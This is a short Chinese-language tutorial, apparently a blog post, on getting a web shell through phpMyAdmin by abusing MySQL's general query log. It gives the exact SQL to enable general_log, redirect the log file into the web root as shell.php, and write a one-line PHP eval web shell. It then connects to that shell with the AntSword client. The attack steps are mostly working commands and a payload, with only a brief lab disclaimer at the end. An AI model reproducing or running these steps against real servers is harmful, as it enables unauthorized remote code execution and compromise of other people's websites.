通过phpmyadmin管理后台getshell思路有很多种,比如直接写入一句话、创建表再导出、慢查询日志等…
这里较详细介绍一下全局日志getshell思路
phpMyAdmin
phpMyAdmin 是众多MySQL图形化管理工具中使用最为广泛的一种,是一款使用PHP 开发的基于B/S模式的MySQL客户端软件,该工具是基于 Web 跨平台的管理程序,并且支持简体中文,用户可以在官网上下载最新版本的。
GetSHELL前提
- phpMyAdmin利用日志文件GetSHELL前提账号必须有可读可写权限
- MySQL 5.0版本以上会创建日志文件,我们通过修改日志文件的全局变量,就可以GetSHELL
- 满足上方两个条件,还需要知道网站的绝对路径 —> 传送门:如何爆路径
这里简单用php探针来获取网站路径
开始吧
查看general log是否开启
show variables like '%general%';
打开general_log日志读写功能
SET GLOBAL general_log='on'; SHOW VARIABLES LIKE '%general%';
创建日志文件
由于之前我们通过php探针得到了网站的绝对路径,然后我们就可以写入shell.php到网站的根目录下:
SET GLOBAL general_log_file='D:\\phpStudy\\PHPTutorial\\WWW\\shell.php';
(注意路径斜杆双写)
写入一句话到shell.php
SELECT '<?php @eval($_POST[yijuhua]);?>';
这里说明一点
如果eval连接不上,可采用另外代码执行函数写入
连上蚁剑
GOT IT!
******************************************************
小实验小结,具体测试利用方式需根据具体实践场景~